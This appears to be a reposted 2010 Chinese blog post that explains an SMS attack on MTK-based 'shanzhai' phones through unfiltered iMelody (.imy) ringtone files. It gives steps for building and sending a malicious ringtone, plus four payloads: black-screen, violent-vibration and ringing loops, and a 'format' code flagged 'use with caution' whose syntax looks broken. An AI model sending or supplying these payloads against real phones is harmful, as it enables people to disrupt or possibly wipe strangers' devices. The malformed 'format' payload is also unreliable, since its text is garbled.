2010-01-26 | 山寨机漏洞及对其攻击的短信代码

攻击对象：
影响手机品牌：所有MTK方案手机（也就是我们常说的山寨手机）
且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能（大部分山寨手机都有此功能）

漏洞原理：
在大部分MTK方案手机中，编写短信息的时候可以插入一种“imy”格式的铃声文件，
而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声
由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。
所以我们可以在“imy”文件内插入代码，通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。
通过这种方式可实现对MTK方案手机的短信攻击。

操作方式：
在电脑上新建文本文档，写入代码，保存为“imy”格式文件。
将这个文件放入手机的“Audio”文件夹内。（注意，一定是手机的“Audio”文件夹，而非内存卡上。）
用手机编辑短信，“选项”——“插入对象”——“我的铃声”，选择你写的“imy”文件。
完成，发送...

代码：

黑屏代码：

BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY

猛震代码：

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY

振铃代码：

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY

格式化代码：（慎用）

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+"@9999999999999999999999999">"+<melody>+"@9999999999999999999999999)"

---

转载地址:http://laoxiege.blog.sohu.com/143248048.html

标签: 手机